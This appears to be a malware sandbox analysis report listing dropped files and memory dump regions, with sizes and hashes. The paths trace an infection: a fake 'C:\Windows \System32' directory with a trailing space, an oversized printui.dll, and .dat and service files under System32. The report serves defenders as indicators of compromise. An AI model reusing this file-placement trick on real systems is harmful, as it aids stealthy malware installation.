5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows \System32\printui.dll

Filesize
13.5MB

MD5
d208410bae05cfa96a7c83c4ce614dd1

SHA1
2b120f3bd686cb5e7e29d338afab78dd9970c70c

SHA256
dc42b209da59c321377f42575f4a43e38036a6482556436b2774cfd08e402668

SHA512
949651249c8a40223dda7bb3183f620b7949cf0afd54cc57f34163595aaba03594e5bac06237d4367d025c3d05c6bc28fc81d4916eba04d8bcb35bf6031ff235

Download Submit
C:\Windows \System32\printui.exe

Filesize
62KB

MD5
a5e526d6accb87538405012b7303036e

SHA1
23720547c84a5af74c29a8825ff83ff50997b615

SHA256
065df0995e7dcce6b51c8b9e53125086ab15598e0445722b3a94f1bbf1a654bf

SHA512
5855a8d8a73cc71be122efcb8ca69969ecae3977ef4c4e4afcf373aab1e0c49f61bcbf5a74b7b2d2d9e57160940df9f00bd3af40b8126771f5b34a7a2115b01e

Download Submit
C:\Windows\System32\console_zero.exe

Filesize
649KB

MD5
4eccb8f5d1edcf18a11abed91ff85c46

SHA1
4cf96ef88d3d042d050cc8d963ef2141975a196a

SHA256
3286edb355b9afcb9f08ca87967001a56685d2298014c82a672ef3769e232838

SHA512
ec8b97ce4712cf94e9c9f5c0454fcbc52559ac4d7d076bf76e2e6a3052fbf18696a5f1bc602a70a06d5101e3f1bcd8b64995a2d71731e7ccb939fe67224924f9

Download Submit
C:\Windows\System32\libcrypto-3-x64.dll

Filesize
4.5MB

MD5
158f0e7c4529e3867e07545c6d1174a9

SHA1
9ff0cccb271f0215ad24427b7254832549565154

SHA256
dcc1fa1a341597ddb1476e3b5b3952456f07870a26fc30b0c6e6312764baa1fc

SHA512
51e79d8d0ab183046f87aa659973b45147bb1e1ae8883f688c615ccb18bf9fccb8779dd872b01748bacd56e141bc096c2bb4ccf32ebd7a49adc76363355e40fe

Download Submit
C:\Windows\System32\libcurl.dll

Filesize
575KB

MD5
18ce47f58b4c1a9cfc1edf7c8bf49b7c

SHA1
e74d08ab06ed8200d7e674d8031d6df8250de8cb

SHA256
36d97f1c254832cee9698cea2f1a63ea98d231641fd29715ef581be103ace602

SHA512
19b2d6968095c4e8f08c66ab73e7ec5e0439712bcb2777266602ef2ad123a779395a3d44bc0c7c9945376998fb2165bc60e6bf682863a55a0cff40c720594bdd

Download Submit
C:\Windows\System32\libiconv-2.dll

Filesize
1.8MB

MD5
158bc77453d382cf6679ce35df740cc5

SHA1
9a3c123ce4b6f6592ed50d6614387d059bfb842f

SHA256
cf131738f4b5fe3f42e9108e24595fc3e6573347d78e4e69ec42106c1eebe42c

SHA512
6eb1455537cb4e62e9432032372fae9ce824a48346e00baf38ef2f840e0ed3f55acaee2656da656db00ae0bdef808f8da291dd10d7453815152eda0ccfc73147

Download Submit
C:\Windows\System32\libintl-9.dll

Filesize
464KB

MD5
e79e7c9d547ddbee5c8c1796bd092326

SHA1
8e50b296f4630f6173fc77d07eea36433e62178a

SHA256
1125ac8dc0c4f5c3ed4712e0d8ad29474099fcb55bb0e563a352ce9d03ef1d78

SHA512
dba65731b7ada0ac90b4122c7b633cd8d9a54b92b2241170c6f09828554a0bc1b0f3edf6289b6141d3441ab11af90d6f8210a73f01964276d050e57fb94248e2

Download Submit
C:\Windows\System32\libpq.dll

Filesize
319KB

MD5
ef060e5c414b7be5875437ff2fb8ec54

SHA1
6dcf04dff9b25be556ec97660f95acf708c0c870

SHA256
e6aced8d30471f35b37abbf172ce357b6a8f18af5feb342b6cffc01d3378f2b4

SHA512
67bff321ba901a0b0dc0f6c4a723d7df35418f593e16e6193673cce5190d76355409f676c1ea5d0cb46493f5735209089a3a52d3d716eb8187bf6e846792e2e8

Download Submit
C:\Windows\System32\libssl-3-x64.dll

Filesize
799KB

MD5
69d0fee0cc47c3b255c317f08ce8d274

SHA1
782bc8f64b47a9dcedc95895154dca60346f5dd7

SHA256
ba979c2dbfb35d205d9d28d97d177f33d501d954c7187330f6893bb7d0858713

SHA512
4955252c7220810ed2eaca002e57d25fbc17862f4878983c4351c917cf7873eb84ae00e5651583004f15a08789be64bdb34ff20cb0e172c9c1376706deb4aa1a

Download Submit
C:\Windows\System32\winsvcf\x401384.dat

Filesize
6.1MB

MD5
5fba8ae226b096da3b31de0e17496735

SHA1
d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3

SHA256
ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40

SHA512
951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72

Download Submit
C:\Windows\System32\x272391.dat

Filesize
1.9MB

MD5
dd6b814d79b44d3a17ef1175c724f199

SHA1
4b50ad258d2d177f22ed06ce3494dea67c180b22

SHA256
ed6bf39b821cf5ecb2e73b6021913b9d6f0fc73a82ee9e9c8b64b2a0eb7e917c

SHA512
60a92d0fe216eccf001abc9d90ab21d459c1442b999d3719129c17814bf529f19edcb35469ed79691072747e0f57c4c417600b8a398bfc1131f42d324a5fded2

Download Submit
C:\Windows\System32\zlib1.dll

Filesize
88KB

MD5
f53d1efea4855da42da07de49d80ba68

SHA1
920349f4bd5a5b8e77195c81e261dfa2177eb1ee

SHA256
7e9f43688189578042d791e3e5301165316edc7c1ed739e0669c033a3ca08037

SHA512
5d72f64b8e5c42a3c9a7bcbbe8a1598a85402ade4f312ab9e26869f8b39952a3aa037f2cf7da89e686c5bc3fcb221feeae077b9ffd2eef98dac0e307637fe7bd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5de2720778335c78a5f4a90339e8a039

SHA1
1840515d42b6b47d70a9eb51bd876cd8e68dac65

SHA256
b21e22aac7765ac77db750e54ba20463b8fa9d689c2e24927ac7b38de5733610

SHA512
0d6e296348273299ede4d58c36b16467dee14150fc382203a8a8c722a0f04957320851b63dcdc091de5e7105a688c559556cc7ea7912cdf2fb0bca98d5c0465f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95a9019b15f94c188b62bbe76fe53e65

SHA1
8d4006d054ed0cd4777d51d6038a9b408e706d03

SHA256
791f16276403ff296f120cd9e0aae3da4fa5aceb3b542034444f5dcb5c659b5d

SHA512
28a3da7d32dccfda9e84798ccca11e5f43a0676087ff3771c379f966df64ba3bac0c34dd048d13ae097646979d87bf6952a766a47259c9f6ddcea4bff3442454

Download Submit
\??\c:\windows\system32\libwinpthread-1.dll

Filesize
51KB

MD5
9dc829c2c8962347bc9adf891c51ac05

SHA1
bf9251a7165bb2981e613ac5d9051f19edb68463

SHA256
ffe2d56375bb4e8bdee9037df6befc5016ddd8871d0d85027314dd5792f8fdc9

SHA512
fd7e6f50a21cb59075dfa08c5e6275fd20723b01a23c3e24fb369f2d95a379b5ac6ae9f509aa42861d9c5114be47cce9ff886f0a03758bfdc3a2a9c4d75fab56

Download Submit
\??\c:\windows\system32\winsvcf\winlogsvc

Filesize
400B

MD5
69a917e87181c8ae22d12bc473804047

SHA1
2669775daa5d3001f9d39053bfe8843a2845da11

SHA256
f0552385109708dc77e1bfb3b27c684313396282211aaec01cc742e4f98184db

SHA512
e0d31e53f7821a60d0d264ed436239eabc995315f5d20cdae6a7f9dc16e5e1857d284679b3208e2be748ddf6977325e8bad75987ce2d2dc7ad87cbba883298fb

Download Submit
memory/1504-88-0x0000000066000000-0x00000000661BD000-memory.dmp

Filesize
1.7MB

Download
memory/1504-87-0x0000000064940000-0x0000000064955000-memory.dmp

Filesize
84KB

Download
memory/1504-200-0x0000000068280000-0x00000000682F0000-memory.dmp

Filesize
448KB

Download
memory/1504-86-0x0000000068280000-0x00000000682F0000-memory.dmp

Filesize
448KB

Download
memory/2040-128-0x000002E6FE260000-0x000002E6FE27A000-memory.dmp

Filesize
104KB

Download
memory/2040-130-0x000002E6FE240000-0x000002E6FE246000-memory.dmp

Filesize
24KB

Download
memory/2040-123-0x000002E6FDFE0000-0x000002E6FDFFC000-memory.dmp

Filesize
112KB

Download
memory/2040-124-0x000002E6FE000000-0x000002E6FE0B5000-memory.dmp

Filesize
724KB

Download
memory/2040-125-0x000002E6FDD90000-0x000002E6FDD9A000-memory.dmp

Filesize
40KB

Download
memory/2040-126-0x000002E6FE220000-0x000002E6FE23C000-memory.dmp

Filesize
112KB

Download
memory/2040-127-0x000002E6FE200000-0x000002E6FE20A000-memory.dmp

Filesize
40KB

Download
memory/2040-131-0x000002E6FE250000-0x000002E6FE25A000-memory.dmp

Filesize
40KB

Download
memory/2040-129-0x000002E6FE210000-0x000002E6FE218000-memory.dmp

Filesize
32KB

Download
memory/2704-226-0x0000026A50240000-0x0000026A50260000-memory.dmp

Filesize
128KB

Download
memory/2744-0-0x00007FFB52293000-0x00007FFB52295000-memory.dmp

Filesize
8KB

Download
memory/2744-15-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

Filesize
10.8MB

Download
memory/2744-12-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

Filesize
10.8MB

Download
memory/2744-11-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

Filesize
10.8MB

Download
memory/2744-7-0x00000264737C0000-0x00000264737E2000-memory.dmp

Filesize
136KB

Download
memory/3716-31-0x00007FFB51E90000-0x00007FFB52951000-memory.dmp

Filesize
10.8MB

Download
memory/3716-29-0x00007FFB51E90000-0x00007FFB52951000-memory.dmp

Filesize
10.8MB

Download
memory/3716-28-0x00007FFB51E90000-0x00007FFB52951000-memory.dmp

Filesize
10.8MB

Download
memory/3716-22-0x00007FFB51E90000-0x00007FFB52951000-memory.dmp

Filesize
10.8MB

Download